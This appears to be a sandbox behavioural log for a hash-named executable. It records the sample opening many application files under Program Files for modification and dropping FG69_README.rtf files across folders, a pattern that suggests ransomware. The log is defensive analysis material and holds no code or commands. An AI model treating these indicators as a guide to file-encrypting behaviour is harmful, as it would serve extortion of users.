d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Marquesas d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Thimphu d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_pt_BR.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.transport.ecf.nl_zh_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\DismountUninstall.pptx d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Yakutat d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Antarctica\Troll d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ca\LC_MESSAGES\vlc.mo d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Minsk d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\mobile_equalizer.html d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\SettingsInternal.zip d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\lua\http\css\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.win32.nl_zh_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\North_Dakota\New_Salem d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Tijuana d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Volgograd d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Windows Journal\Templates\Genko_1.jtp d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\desktop.ini d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Easter d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Vilnius d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jetty.http_8.1.14.v20131031.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-autoupdate-cli_ja.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\about.html d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.touchpoint.eclipse.nl_zh_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Midway d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Indian\Chagos d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\tet\LC_MESSAGES\vlc.mo d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rcp.intro_5.5.0.165303.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\et\LC_MESSAGES\vlc.mo d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\mailapi.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Rio_Branco d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\jp2launcher.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\epl-v10.html d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Luxembourg d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Bissau d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.fca d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\requests\status.json d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\intf\modules\host.luac d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\native2ascii.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx.zh_CN_5.5.0.165303.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\META-INF\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\COPYING.txt d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Multimedia\MPP\Flash.mpp d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\management-agent.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Pago_Pago d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jre7\lib\zi\Atlantic\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\chrome_200_percent.pak d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\rmid.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\fy\LC_MESSAGES\vlc.mo d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Karachi d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.console_5.5.0.165303\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\java.policy d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-spi-quicksearch.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Jerusalem d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Kathmandu d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Installer\chrome.7z d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Inuvik d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.metadata.nl_zh_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.browser.attach.ja_5.5.0.165303.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jre7\lib\zi\America\Argentina\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\newgrounds.luac d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-output2_ja.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Indiana\Petersburg d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\LucidaBrightRegular.ttf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\win7TSFrame.png d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\dark\e4-dark_preferencestyle.css d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.frameworkadmin.equinox.nl_ja_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\nacl_irt_x86_64.nexe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\management\jmxremote.access d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\feature.properties d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\tnameserv.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Indiana\Winamac d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\dark\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Zaporozhye d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_de.properties d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\bin\ssvagent.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Mozilla Firefox\crashreporter.ini d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\bin\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\triggerConstraints.exsd d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Araguaina d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ia\LC_MESSAGES\vlc.mo d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\cmm\CIEXYZ.pf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Argentina\La_Rioja d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\si\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\GREEK.TXT d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\appletviewer.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ecf.provider.filetransfer.httpclient4_1.0.800.v20140827-1444.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Hermosillo d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Dawson_Creek d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\ResourceInternal.zip d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Ho_Chi_Minh d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Indian\Christmas d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\UserControl.zip d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\jfr\profile.jfc d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Godthab d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-settings_zh_CN.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\sv.pak d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\META-INF\MANIFEST.MF d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Krasnoyarsk d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\he\LC_MESSAGES\vlc.mo d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Lagos d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Indian\Chagos d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\javaw.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.hyp d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-selector-ui_zh_CN.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\META-INF\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\Folder-48.png d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.nl_ja_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\YST9 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\VDK10.CMP d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-heapwalker_ja.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Bishkek d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Choibalsan d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\UTC d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\CST6 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Mozilla Firefox\crashreporter.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.attach_5.5.0.165303.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\sql90.xsl d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\jvm.hprof.txt d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.model.workbench.nl_zh_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\ij d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\sl\LC_MESSAGES\vlc.mo d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-7 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\SaveAsRTF.api d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui_5.5.0.165303.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\sunjce_provider.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\dailymotion.luac d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Installer\chrmstp.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\an\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ms\LC_MESSAGES\vlc.mo d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Budapest d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Andorra d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\SystemV\EST5EDT d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Paramaribo d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Baku d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\security\java.security d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Khandyga d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\jfr\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Mozilla Firefox\defaults\pref\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Luxembourg 